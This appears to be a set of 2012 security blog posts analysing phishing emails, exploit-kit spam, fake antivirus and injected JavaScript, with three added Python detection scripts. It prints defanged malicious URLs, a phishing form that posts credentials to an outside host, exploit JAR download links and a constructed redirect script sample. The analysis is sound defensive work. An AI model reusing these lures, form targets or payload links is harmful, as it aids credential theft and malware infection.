Phishing: Attention ! Votre compte PayPal a été limité (“Attention! Your PayPal account has been limited”)

A new phishing email is being used to spread HTML files containing fake PayPal login forms:

Phishing Email

Header details:

Received: from ns3.komvos.gr (ns3.komvos.gr [88.198.65.153])
Received: by ns3.komvos.gr (Postfix, from userid 48)
Subject: Attention ! Votre compte PayPal a été limité !
From: Service Paypal
Date: Mon,  4 Jun 2012 13:00:12 +0300 (EEST)
Content-Disposition: attachment; filename="Informations Compte Paypal .zip"

There is a ZIP file attached:

File: Informations Compte Paypal .zip
Size: 5391 bytes

The extracted file is a .HTML file:

File: Informations Compte Paypal .html
Size: 22525 bytes

From this HTML code:

<form action="hxxp:// byrongoldworks .com /mainbody.php" method="post" name="zaz" onsubmit="return verif_formulaire()">

We can see that the sensitive data typed into the form (the victim's credentials) is POSTed to:

hxxp:// byrongoldworks .com /mainbody.php

Report from URLVoid:

URLVoid Report for byrongoldworks .com

Spam “Your Bill Me Later notice” leads to Incognito exploit kit

Users have reported another malicious email message with the subject “Your Bill Me Later notice”, which states that you have made a payment over the phone of $60.12 on the Bill Me Later website. The email body is full of HREF links pointing to many malicious URLs; here is a screenshot of the email message:

Your Bill Me Later notice

Email header details:

Received: from server.serverhk.net (69-164-193-60.magicnic.com [69.164.193.60])
Received: from [200.76.191.2] (helo=askokay.com) by server.serverhk.net with esmtpsa
Received: from [192.245.26.33] by m1.gns.snv.thisdomainl.com with SMTP; Wed, 16 May 2012 21:04:47 +1000
Received: from [68.117.211.36] by mailout.endmonthnow.com with NNFMP; Wed, 16 May 2012 20:54:02 +1000
Date: Wed, 16 May 2012 20:50:24 +1000
From: "Advera" askokay@askokay.com
Subject: Your Bill Me Later notice

The malicious extracted URLs are:

Using URL Dump we can dump the HTML content:

Dumped HTML Content

From the dumped data, we can see it is the Incognito exploit kit.

Extracted malicious URLs:

hxxp:// bigdeal . my/ZyYJZ7F0/js.js

The malicious URLs redirect users to another malicious URL:

hxxp:// 69.163.34. 134 /showthread.php?t=977334ca118fcb8c

If we use URL Dump with the user-agent set to Java, the dumped content of the new malicious URL shows that the kit recognises from the user-agent that Java is installed and tries to serve the malicious Java applet:

Dumped Data

More Malicious Links Spammed to Twitter Users

Another malicious link received by a user via Twitter:

hxxp:// profitscoaching .info /index.php?eVTv=1336686044437

Whois details:

Domain Name: profitscoaching .info
Registrar: GoDaddy.com LLC (R171-LRMS)
Status: CLIENT DELETE PROHIBITED, CLIENT RENEW PROHIBITED, CLIENT TRANSFER PROHIBITED, CLIENT UPDATE PROHIBITED
Expiration Date: 2013-03-07 14:59:08
Creation Date: 2012-03-07 14:59:08
Last Update Date: 2012-05-06 20:39:46
Name Servers:
ns61.domaincontrol.com
ns62.domaincontrol.com
 
Registrant Contact Information:
Name: Registration Private
Organization: Domains By Proxy, LLC
Address 1: DomainsByProxy.com
Address 2: 15111 N. Hayden Rd., Ste 160, PMB 353
City: Scottsdale
State: Arizona
Zip: 85260
Country: US
Phone: +1.4806242599
Fax: +1.4806242598

Hosting details:

The website profitscoaching .info is hosted at WholeSale Internet and its current IP address is 173.208.196.245 (-). The server machine is located in United States (US) and in the same server there are hosted other 0 websites. The domain is registered with the suffix INFO and the keyword of the domain is profitscoaching. The organization is Gold VIP Club.

The malicious link redirects users to another malicious link:

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.6.32
Date: Fri, 11 May 2012 22:55:44 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.2.6-1+lenny16
Set-Cookie: PHPSESSID=1bff1c2b505aa2004bda6028bb28ad0a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: hxxp:// aooale .info /ytb/redirect.php

Extracted malicious link:

hxxp:// aooale .info /ytb/redirect.php

Whois details:

Domain Name: aooale .info
Registrar: GoDaddy.com LLC (R171-LRMS)
Status: CLIENT DELETE PROHIBITED, CLIENT RENEW PROHIBITED, CLIENT TRANSFER PROHIBITED, CLIENT UPDATE PROHIBITED
Expiration Date: 2012-09-21 13:41:55
Creation Date: 2011-09-21 13:41:55
Last Update Date: 2011-11-20 20:41:26
Name Servers:
ns49.domaincontrol.com
ns50.domaincontrol.com
 
Registrant Contact Information:
Name: Registration Private
Organization: Domains By Proxy, LLC
Address 1: DomainsByProxy.com
Address 2: 15111 N. Hayden Rd., Ste 160, PMB 353
City: Scottsdale
State: Arizona
Zip: 85260
Country: US
Phone: +1.4806242599
Fax: +1.4806242598

Hosting details:

The website aooale.info is hosted at DirectSpace Networks, LLC. and its current IP address is 174.140.169.101 (-). The server machine is located in United States (US) and in the same server there are hosted other 0 websites. The domain is registered with the suffix INFO and the keyword of the domain is aooale. The organization is DirectSpace Networks, LLC.

URLVoid scan reports:

http://urlvoid.com/scan/aooale .info
http://urlvoid.com/scan/profitscoaching .info

Other malicious links:

hxxp:// ioi8 .info /gps
hxxp:// bp9 .info /mobi/redirect.php
hxxp:// iso8 .info /lg
hxxp:// jay8 .info /b2d
hxxp:// saov .info /mobilemoneymachines/

The pages to which users are ultimately redirected appear to be scam pages:

Fake Make Money Sites

The scam pages show fake images of people holding a check and promote the “Work at home mum makes

Spam link on Twitter leads to Fake Antivirus Rogue Software

One user has reported to us a malicious URL that is being sent as a private message to registered Twitter users; the extracted malicious link is:

hxxp:// www. delicious-audio .com /wp-content

If clicked, it redirects users to a new malicious link:

HTTP/1.1 302 Found
Date: Tue, 08 May 2012 20:50:06 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Location: hxxp:// blog.keeples .com /wp-content
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 27
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Extracted malicious link:

hxxp:// blog.keeples .com /wp-content

Now there is a new redirect to another malicious link:

HTTP/1.1 302 Found
Date: Tue, 08 May 2012 20:50:13 GMT
Server: Apache/2.2.3 (CentOS)
Location: hxxp:// spywarecleanermicrosoft .info /0520091375cbc551/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Extracted malicious link:

hxxp:// spywarecleanermicrosoft .info /0520091375cbc551/

This is the link of the web page of the fake antivirus rogue software.

Whois details:

Domain Name: spywarecleanermicrosoft.info
Registrar: eNom, Inc. (R126-LRMS)
Status: CLIENT TRANSFER PROHIBITED, TRANSFER PROHIBITED, ADDPERIOD
Expiration Date: 2013-05-08 11:32:40
Creation Date: 2012-05-08 11:32:40
Last Update Date: 2012-05-08 11:33:15
 
Name Servers:
ns1.dnsexit.com
ns2.dnsexit.com
ns3.dnsexit.com
ns4.dnsexit.com
 
Registrant Contact Information:
Name: Gerolamo Genovese
Address 1: Via Bernardino Rota 1
City: Mellana
State: CN
Zip: 12012
Country: IT
Phone: +39.3535605212
Email: kinsman@doramail.com

Hosting details:

The website spywarecleanermicrosoft .info is hosted at BurstNET Limited and its current IP address is 31.193.12.3 (31-193-12-3.static.hostnoc.net). The server machine is located in United Kingdom (GB) and in the same server there are hosted other 0 websites. The domain is registered with the suffix INFO and the keyword of the domain is spywarecleanermicrosoft. The organization is BurstNET Limited.

Screenshot of the fake warning message:

Fake Warning Message

Screenshot of the fake scanning web page:

Fake Scanning Page

From the above images we can see that the fake security software being distributed is named Windows Antivirus 2012. After the fake system scan finishes, the user is prompted to download an executable file named setup.exe:

Downloaded File

The file is downloaded from a new malicious website:

GET /0520091375cbc551/setup.exe HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Referer: hxxp:// spywarecleanermicrosoft .info /0520091375cbc551/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: scannerdatamicrosoft .info

Whois Details:

Domain Name: scannerdatamicrosoft .info
Registrar: eNom, Inc. (R126-LRMS)
Status: CLIENT TRANSFER PROHIBITED, TRANSFER PROHIBITED, ADDPERIOD
Expiration Date: 2013-05-08 11:11:28
Creation Date: 2012-05-08 11:11:28
Last Update Date: 2012-05-08 11:12:08
 
Name Servers:
ns1.dnsexit.com
ns2.dnsexit.com
ns3.dnsexit.com
ns4.dnsexit.com
 
Registrant Contact Information:
Name: Dionisia Barese
Address 1: Corso Porta Borsari 78
City: San Martino Di Castrozza
State: TN
Zip: 38058
Country: IT
Phone: +39.3171462400
Email: milner@snail-mail.net

Hosting details:

The website scannerdatamicrosoft .info is hosted at SPLIUS, UAB and its current IP address is 77.79.10.13 (hst-10-13.duomenucentras.lt). The server machine is located in Lithuania (LT) and in the same server there are hosted other 0 websites. The domain is registered with the suffix INFO and the keyword of the domain is scannerdatamicrosoft. The organization is Webhosting, collocation services.

File details:

File: setup.exe
Size: 2278400 bytes

When setup.exe is executed, the rogue software drops two .EXE files:

Dropped .EXE files

File Modified - %SAMPLE% - %AppData%\Protector-phkm.exe
Process Created - %SAMPLE% - %AppData%\Protector-phkm.exe - Unknown Publisher - EC91E0F31587F6471A4EBCFE2681A45B - 2278400 bytes
File Created - %SAMPLE% - %AppData%\Protector-phkm.exe - EC91E0F31587F6471A4EBCFE2681A45B - 2278400 bytes - attr: [] - PE
Process Created - %SAMPLE% - C:\WINDOWS\system32\cmd.exe - Microsoft Corporation - 6D778E0F95447E6546553EEEA709D03C - 389120 bytes
File Deleted - C:\WINDOWS\system32\cmd.exe - %SAMPLE% - 2278400 bytes
File Modified - %SAMPLE% - %AppData%\Protector-tpqx.exe
Process Created - %SAMPLE% - %AppData%\Protector-tpqx.exe - Unknown Publisher - EC91E0F31587F6471A4EBCFE2681A45B - 2278400 bytes
File Created - %SAMPLE% - %AppData%\Protector-tpqx.exe - EC91E0F31587F6471A4EBCFE2681A45B - 2278400 bytes - attr: [] - PE
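The trace above shows the rogue installer copying itself under %AppData% and launching the copy. As an added example (not code from the original post), the following Python function picks that self-copy-and-execute pattern out of trace lines in this format; the ' - ' separated field layout is assumed from the trace as shown, and the sample lines are the ones quoted above.

```python
"""Find %AppData% executables that are byte-identical copies of the sample
and were then launched with no known publisher, from a ' - ' separated
sandbox trace (layout assumed from the trace quoted in the write-up)."""
import re

MD5_RE = re.compile(r"^[0-9A-Fa-f]{32}$")
SIZE_RE = re.compile(r"^(\d+) bytes$")


def parse_line(line: str):
    """'Event - field - field ...' -> (event, [fields])."""
    parts = [p.strip() for p in line.split(" - ")]
    return parts[0], parts[1:]


def first_match(fields, pattern):
    """First field matching the regex, as a match object, or None."""
    for f in fields:
        m = pattern.match(f)
        if m:
            return m
    return None


def self_copies(trace, sample_md5: str, sample_size: int):
    """Sorted %AppData% paths that both received a copy with the sample's MD5
    and size (File Created) and were then run as 'Unknown Publisher'."""
    created, executed = set(), set()
    for line in trace:
        event, fields = parse_line(line)
        path = next((f for f in fields if f.startswith("%AppData%")), None)
        if path is None:
            continue  # cmd.exe and other system paths are not of interest here
        md5 = first_match(fields, MD5_RE)
        size = first_match(fields, SIZE_RE)
        same_bytes = (md5 is not None and md5.group(0).upper() == sample_md5.upper()
                      and size is not None and int(size.group(1)) == sample_size)
        if event == "File Created" and same_bytes:
            created.add(path)
        elif event == "Process Created" and same_bytes and "Unknown Publisher" in fields:
            executed.add(path)
    return sorted(created & executed)


# The trace lines quoted in the write-up (values as logged there).
TRACE = [
    r"File Modified - %SAMPLE% - %AppData%\Protector-phkm.exe",
    r"Process Created - %SAMPLE% - %AppData%\Protector-phkm.exe - Unknown Publisher - EC91E0F31587F6471A4EBCFE2681A45B - 2278400 bytes",
    r"File Created - %SAMPLE% - %AppData%\Protector-phkm.exe - EC91E0F31587F6471A4EBCFE2681A45B - 2278400 bytes - attr: [] - PE",
    r"Process Created - %SAMPLE% - C:\WINDOWS\system32\cmd.exe - Microsoft Corporation - 6D778E0F95447E6546553EEEA709D03C - 389120 bytes",
    r"File Deleted - C:\WINDOWS\system32\cmd.exe - %SAMPLE% - 2278400 bytes",
    r"File Modified - %SAMPLE% - %AppData%\Protector-tpqx.exe",
    r"Process Created - %SAMPLE% - %AppData%\Protector-tpqx.exe - Unknown Publisher - EC91E0F31587F6471A4EBCFE2681A45B - 2278400 bytes",
    r"File Created - %SAMPLE% - %AppData%\Protector-tpqx.exe - EC91E0F31587F6471A4EBCFE2681A45B - 2278400 bytes - attr: [] - PE",
]
SAMPLE_MD5, SAMPLE_SIZE = "EC91E0F31587F6471A4EBCFE2681A45B", 2278400

if __name__ == "__main__":
    print(self_copies(TRACE, SAMPLE_MD5, SAMPLE_SIZE))
```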

And this is the screenshot of the splash screen of the rogue software:

Splash Screen (windows-prosecurity-scanner-fake-antivirus)

More screenshots of the rogue software:

GUI

When the user clicks the “Activate” button, the rogue executable opens a new Internet Explorer window where the user is asked to enter his/her credit card details (which are stolen by the trojan); here is a screenshot of the malicious web page:

Fraud Page

Connections logged:

GET / HTTP/1.0
Accept: application/x-shockwave-flash, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www. cmyip .com
Connection: Keep-Alive
 
GET /service/ HTTP/1.0
User-Agent: Mozilla/4.0
Host: 0520091375cbc551 .on-linepaysafery .info
 
POST / HTTP/1.0
Accept: application/x-shockwave-flash, */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 0520091375cbc551. on-linepaysafery .info
Content-Length: 109
Connection: Keep-Alive
Pragma: no-cache
Cookie: ct=2011:3:27:23:23; ch=f58320d2a7c79b1a48b7c70a7d2d280a
action=form&projectId=72&partnerId=146&subId=0&install_id=yhstmcvcgj&group_name=2011-3-28_1&reason=errorflash
 
GET /payment_forms/default/images/sprite.png HTTP/1.0
Accept: */*
Referer: hxxp://0520091375cbc551 .on-linepaysafery .info /
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 0520091375cbc551 .on-linepaysafery .info
Connection: Keep-Alive
Cookie: ct=2011:3:27:23:23; ch=f58320d2a7c79b1a48b7c70a7d2d280a

Malicious links extracted:

hxxp:// 0520091375cbc551. on-linepaysafery .info /service/

Whois Details:

Domain Name: on-linepaysafery .info
Registrar: eNom, Inc. (R126-LRMS)
Status: CLIENT TRANSFER PROHIBITED, TRANSFER PROHIBITED, ADDPERIOD
Expiration Date: 2013-05-08 08:24:44
Creation Date: 2012-05-08 08:24:44
Last Update Date: 2012-05-08 08:26:02
 
Name Servers:
ns1.dnsexit.com
ns2.dnsexit.com
ns3.dnsexit.com
ns4.dnsexit.com
 
Registrant Contact Information:
Name: Dionisia Barese
Address 1: Corso Porta Borsari 78
City: San Martino Di Castrozza
State: TN
Zip: 38058
Country: IT
Phone: +39.3171462400
Email: sini@wildmail.com

Hosting details:

The website www.on-linepaysafery .info is hosted at SPLIUS, UAB and its current IP address is 77.79.10.15 (hst-10-15.duomenucentras.lt). The server machine is located in Lithuania (LT) and in the same server there are hosted other 2 websites. The domain is registered with the suffix INFO and the keyword of the domain is on-linepaysafery. The organization is Webhosting, collocation services.

URLVoid scan reports:

http://www.urlvoid.com/scan/delicious-audio .com
http://www.urlvoid.com/scan/spywarecleanermicrosoft .info
http://www.urlvoid.com/scan/0520091375cbc551. on-linepaysafery .info
http://www.urlvoid.com/scan/on-linepaysafery .info
http://www.urlvoid.com/scan/blog.keeples .com
http://www.urlvoid.com/scan/scannerdatamicrosoft .info

Link LinkedIn Mail leads to Incognito exploit kit

We have logged a new email that appears to have been sent by LinkedIn:

Scam Email

The email header info shows it is a scam:

Received: from lhost10.forahost.net (server-178.211.48.24.as42926.net [178.211.48.24])
Received: from c9069568.static.spo.virtua.com.br ([201.6.149.104]:49583 helo=fixnot.com.tr) by lhost10.forahost.net
Date: Fri, 04 May 2012 08:34:11 -0700
From: "Order" @fixnot.com.tr
Subject: Link LinkedIn Mail

The email body also contains a few malicious links:

hxxp:// gopeshmathur .com/ZgUBqavg/index.html

The dumped content of the URL is clearly an Incognito exploit kit:

Incognito exploit kit URLs

All the new malicious links are still live and redirect users to:

Incognito exploit kit

The Java exploit JAR files are downloaded from:

hxxp:// 50.116.8. 93 /data/Pol.jar
hxxp:// 69.163.34 .114 /data/Pol.jar

File: Pol.jar
Size: 15404 bytes

The JAR file exploits CVE-2012-0507, a vulnerability in the Java Runtime Environment component of Oracle Java SE; more details from the oracle.com website:

Vulnerability in the Java Runtime Environment component of Oracle Java SE (subcomponent: Concurrency). Supported versions that are affected are 7 Update 2 and before, 6 Update 30 and before and 5.0 Update 33 and before. Easily exploitable vulnerability allows successful unauthenticated network attacks via multiple protocols. Successful attack of this vulnerability can result in unauthorized update, insert or delete access to some Java Runtime Environment accessible data as well as read access to a subset of Java Runtime Environment accessible data and ability to cause a partial denial of service (partial DOS) of Java Runtime Environment.

Other malicious Incognito exploit kit URLs:

hxxp:// ftp.coden .com .br /BhxC8VrP/index.html
hxxp:// generalcontractorsnc .com/nUUyHyvy/index.html
hxxp:// mccgedvalenca .com .br/JFs10e34/index.html
hxxp:// radiooisvira .com /mRpNLgWY/index.html
hxxp:// statisticsolympiad .org /gR2aietM/index.html

Com.Br Websites Infected with Malicious JS Code (count18.php)

Our sandbox has logged various domains with the .COM.BR suffix infected with malicious obfuscated JavaScript code, injected at the very beginning of the site's HTML pages, before the opening <html> tag:

Obfuscated JS code

The malicious script redirects the users to a malicious URL:

hxxp:// bylviha .ru/count18.php

Examples of infected websites:

hxxp:// carboniferacatarinense .com .br/
hxxp:// www. csir-iir. org/
hxxp:// www. terapets .com/

Sometimes the malicious script is injected inside the <title> tag:

JS Injected in Title TAG
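Both placements described here (a script before the opening <html> tag, and a script nested inside <title>) are easy to check for mechanically. As an added example (not code from the original post), the following Python function flags scripts in either position and reports the outbound URLs and obfuscation constructs found in them; the page bodies are constructed samples with defanged (hxxp) URLs.

```python
"""Flag <script> elements placed before <html> or inside <title>, the two
injection points described in the write-up. Standard library only."""
import re

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
HTML_OPEN_RE = re.compile(r"<html\b", re.I)
TITLE_RE = re.compile(r"<title\b[^>]*>(.*?)</title>", re.I | re.S)
URL_RE = re.compile(r"h(?:tt|xx)ps?://[^\s'\"<>]+", re.I)
# Constructs typical of packed/obfuscated injects; reported in this order.
OBFUSCATION_MARKERS = ("eval(", "unescape(", "fromCharCode", "document.write")


def script_report(body: str) -> dict:
    """Outbound URLs and obfuscation markers found in one script body."""
    return {"urls": URL_RE.findall(body),
            "markers": [m for m in OBFUSCATION_MARKERS if m in body],
            "length": len(body)}


def find_injected_scripts(page: str):
    """Return (placement, report) for every script in a suspicious place."""
    findings = []
    m = HTML_OPEN_RE.search(page)
    # Everything before <html> is outside the document proper. With no <html>
    # tag at all there is nothing to anchor on, so that check is skipped.
    html_start = m.start() if m else 0
    for s in SCRIPT_RE.finditer(page[:html_start]):
        findings.append(("before-html", script_report(s.group(1))))
    # <title> may contain only text; a script element inside it was injected.
    for t in TITLE_RE.finditer(page):
        for s in SCRIPT_RE.finditer(t.group(1)):
            findings.append(("in-title", script_report(s.group(1))))
    return findings


# Constructed samples modelled on the two placements seen in the write-up.
BEFORE_HTML = ('<script>eval(unescape("%76%61%72%20%75%3D%31"));</script>\n'
               '<html><head><title>Shop</title></head><body>ok</body></html>')
IN_TITLE = ('<html><head><title>Shop<script>window.location='
            '"hxxp://bylviha.ru/count18.php"</script></title></head>'
            '<body></body></html>')
CLEAN = ('<!DOCTYPE html><html><head><title>Shop</title>'
         '<script src="/static/app.js"></script></head><body></body></html>')

if __name__ == "__main__":
    for name, page in (("before_html", BEFORE_HTML), ("in_title", IN_TITLE), ("clean", CLEAN)):
        print(name, find_injected_scripts(page))
```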

URLVoid reports of malicious domains:

http://www.urlvoid.com/scan/bylviha .ru
http://www.urlvoid.com/scan/carboniferacatarinense .com .br
http://www.urlvoid.com/scan/csir-iir. org
http://www.urlvoid.com/scan/terapets .com

Phishing: A causa del nostro recente aggiornamento. Verified by Visa (“Due to our recent update”)

We have logged other phishing emails used to steal details of Visa users:

From - Mon Apr 23 16:04:50 2012
Received: from ser.just3d.tv (unknown [91.227.127.33])
Received: (qmail 23589 invoked by uid 0); 23 Apr 2012 13:21:36 -0000
Received: from unknown (HELO User) (admin@just3d.tv@151.58.16.184)
Reply-To: sicurela@visaltalia.it
From: "verified by visa" verified@visaitalia.com
Subject: A causa del nostro recente aggiornamento.
Date: Mon, 23 Apr 2012 15.21.34 +0200
To: undisclosed-recipients:;

Note from the email header the source of the message:

Received: from ser.just3d.tv (unknown [91.227.127.33])

It has nothing to do with Visa. Note also the e-mail addresses:

Reply-To: sicurela@visaltalia.it

Note that visaltalia.it is spelled with an l, not an i.
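The three checks just made by hand (where the Received chain actually comes from, whether Reply-To matches From, and whether a domain is a lookalike) can be automated. As an added example (not code from the original post), the following Python script runs them over a header block constructed from the headers quoted above; `visaitalia.it` is passed in as the domain the write-up says is being imitated, and the confusable-character table is a small assumed subset.

```python
"""Triage e-mail headers for an unrelated Received chain, a Reply-To that
differs from From, and a lookalike domain (visaltalia.it vs visaitalia.it)."""
import re
from email import message_from_string

ADDR_RE = re.compile(r"[\w.+-]+@((?:[\w-]+\.)+[A-Za-z]{2,})")
RECEIVED_RE = re.compile(r"\bfrom\s+(\S+)(?:\s+\(([^)]*)\))?", re.I)
# Glyphs that look alike in common fonts (assumed subset). Folding both
# domains through this map gives a "skeleton"; equal skeletons = lookalike.
CONFUSABLES = {"rn": "m", "vv": "w", "l": "i", "1": "i", "|": "i", "0": "o"}


def skeleton(domain: str) -> str:
    s = domain.lower()
    for src, dst in CONFUSABLES.items():
        s = s.replace(src, dst)
    return s


def domain_of(header_value) -> str:
    """Domain of the first address in a header value, '' if none found."""
    m = ADDR_RE.search(header_value or "")
    return m.group(1).lower() if m else ""


def received_hops(raw_headers: str):
    """(host, parenthesised detail) per Received header, last hop first."""
    hops = []
    for value in message_from_string(raw_headers).get_all("Received", []):
        m = RECEIVED_RE.search(value)
        if m:
            hops.append((m.group(1), m.group(2) or ""))
    return hops


def triage(raw_headers: str, impersonated_domains):
    """Human-readable findings, in a fixed order, for one header block."""
    msg = message_from_string(raw_headers)
    from_dom, reply_dom = domain_of(msg.get("From")), domain_of(msg.get("Reply-To"))
    findings = []
    if reply_dom and reply_dom != from_dom:
        findings.append(f"Reply-To domain {reply_dom} differs from From domain {from_dom}")
    for dom in dict.fromkeys([from_dom, reply_dom]):  # de-duplicated, ordered
        for brand in impersonated_domains:
            if dom and dom != brand and skeleton(dom) == skeleton(brand):
                findings.append(f"{dom} is a lookalike of {brand}")
    hops = received_hops(raw_headers)
    if hops and not any(from_dom in host for host, _ in hops):
        findings.append(f"no Received hop belongs to {from_dom}; "
                        f"outermost hop: {hops[0][0]} ({hops[0][1]})")
    return findings


# Constructed from the headers quoted in the write-up (mbox 'From -' line omitted).
SAMPLE_HEADERS = """\
Received: from ser.just3d.tv (unknown [91.227.127.33])
Received: (qmail 23589 invoked by uid 0); 23 Apr 2012 13:21:36 -0000
Received: from unknown (HELO User) (admin@just3d.tv@151.58.16.184)
Reply-To: sicurela@visaltalia.it
From: "verified by visa" verified@visaitalia.com
Subject: A causa del nostro recente aggiornamento.
To: undisclosed-recipients:;

"""
```

Running `triage(SAMPLE_HEADERS, ["visaitalia.it"])` yields all three findings for this message.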

The message body of the email (original Italian, followed by an English translation):

Gentile Cliente,
A causa del nostro recente aggiornamento sui nostri server
(23/04/2012) e necessario aggiornare il tuo profilo.
Per una maggiore sicurezza e di accesso, si prega di compilare il
modulo allegato.

Vi ringraziamo della vostra collaborazione.

Copyright Visa Europe 2012. Tutti i diritti riservati

Dear Customer,
Due to our recent update on our servers
(23/04/2012) it is necessary to update your profile.
For greater security and access, please fill in the
attached form.

Thank you for your cooperation.

Copyright Visa Europe 2012. All rights reserved

There is also an attached file named visaitalia.html:

File: visaitalia.html
Size: 20015 bytes

The attached file contains the form used to send the typed details to a remote server. Listed below are a few malicious links extracted from the attached HTML file:

hxxp:// leonidasvancouver .com /admin/plm/plm.html
hxxp:// rottenfish .de /vbv/plm_files/Logo-Mastercard_Secure_Code.gif
hxxp:// rottenfish .de /vbv/plm_files/fin_VerifiedByVisa_186x79.gif
hxxp:// rottenfish .de /vbv/run.php
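Both this Visa attachment and the PayPal attachment analysed earlier work the same way: a form whose action points at an attacker-controlled host, plus brand images pulled from third-party servers. As an added example (not code from the original post), the following Python script extracts the form targets and external resource hosts from such an attachment and flags any form that posts outside the brand it claims to be; the brand-domain list and the sample attachment are constructed for the demonstration.

```python
"""Audit a phishing HTML attachment: form targets, field names, external hosts."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Domains the lure claims to belong to (assumed list for the demo); a form
# that posts anywhere else is the credential drop seen in these attachments.
BRAND_DOMAINS = {"paypal.com", "visa.com", "visaeurope.com"}


def refang(url: str) -> str:
    """Undo analyst defanging: 'hxxp:// a .b /x' -> 'http://a.b/x'."""
    return "".join(url.replace("hxxp", "http").split())


class AttachmentAudit(HTMLParser):
    """Collect <form> targets with their input names, plus external src/href."""

    def __init__(self):
        super().__init__()
        self.forms, self.resources = [], []
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._form = {"action": refang(a.get("action") or ""),
                          "method": (a.get("method") or "get").lower(),
                          "fields": []}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None and a.get("name"):
            self._form["fields"].append(a["name"])
        for attr in ("src", "href"):
            if a.get(attr) and "://" in a[attr]:
                self.resources.append(refang(a[attr]))

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None


def offbrand_forms(html: str, brand_domains=BRAND_DOMAINS):
    """(host, method, fields) for each form posting to a non-brand host."""
    p = AttachmentAudit()
    p.feed(html)
    hits = []
    for f in p.forms:
        host = urlparse(f["action"]).hostname or ""
        trusted = any(host == d or host.endswith("." + d) for d in brand_domains)
        if host and not trusted:
            hits.append((host, f["method"], f["fields"]))
    return hits


def external_hosts(html: str):
    """Distinct hosts that images/links in the attachment are loaded from."""
    p = AttachmentAudit()
    p.feed(html)
    return sorted({urlparse(u).hostname for u in p.resources if urlparse(u).hostname})


# Constructed sample modelled on the quoted PayPal form and the Visa image links.
SAMPLE = """<html><body>
<img src="hxxp:// rottenfish .de /vbv/plm_files/fin_VerifiedByVisa_186x79.gif">
<form action="hxxp:// byrongoldworks .com /mainbody.php" method="post" name="zaz">
  <input type="text" name="email"><input type="password" name="password">
  <input type="submit" value="Continuer">
</form></body></html>"""
```

`offbrand_forms(SAMPLE)` reports the off-brand POST target with the field names it collects, and `external_hosts(SAMPLE)` lists the third-party host serving the brand imagery.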

The malicious websites are flagged as detected in URLVoid:

http://www.urlvoid.com/scan/rottenfish .de/
http://www.urlvoid.com/scan/leonidasvancouver .com/

Express LinkedIn Mail: Spam Spreading Blackhole Exploit Kit URLs

We have received a few emails that appeared to be sent from LinkedIn:

Email

But after checking the email header details it was clearly spam:

Return-Path: trtro@www.trt.ro
Received: from vps136.whmpanels.com (unknown [89.42.219.181])
Received: from [95.6.42.101] (helo=www.trt.ro) by vps136.whmpanels.com
Date: Fri, 30 Mar 2012 21:37:47 +0100
From: "Support" trtro@www.trt.ro
Subject: Express LinkedIn Mail

The A HREF links redirect to 3 different malicious URLs:

hxxp:// groupehydrogaz .com/20sZhJqa/index.html
hxxp:// dealerpos .com/uFj7A93z/index.html
hxxp:// hobbyconcept666.yellis .net/20sZhJqa/index.html

URLVoid reports:

http://www.urlvoid.com/scan/groupehydrogaz.com/
http://www.urlvoid.com/scan/dealerpos.com/
http://www.urlvoid.com/scan/hobbyconcept666.yellis.net/

The page content dumped from one of these malicious URLs looks like:

Dumped Content

That content matches the distribution style of the Blackhole Exploit Kit.

Other malicious URLs are:

hxxp:// ftp.planitur .com.br/dyEmcL4N/js.js
hxxp:// quiztown .org/U2iBLpvu/js.js
hxxp:// wap .tl/8M6kMfpV/js.js
hxxp:// laspeziacaritas .it/1M4VoeVe/js.js

URLVoid reports:

http://www.urlvoid.com/scan/ftp.planitur.com.br/
http://www.urlvoid.com/scan/quiztown.org/
http://www.urlvoid.com/scan/wap.tl/
http://www.urlvoid.com/scan/laspeziacaritas.it/

Always pay attention when opening emails, whether from known or unknown senders:

1) Always analyze the email headers to see who really sent the email
2) Scan links with our service http://www.urlvoid.com/
3) Do not download unknown files
4) Avoid opening emails whose subject relates to pharmaceutical products
5) Avoid opening emails whose subject relates to sexual content
6) When an email claims to be from your bank, always call your bank before opening it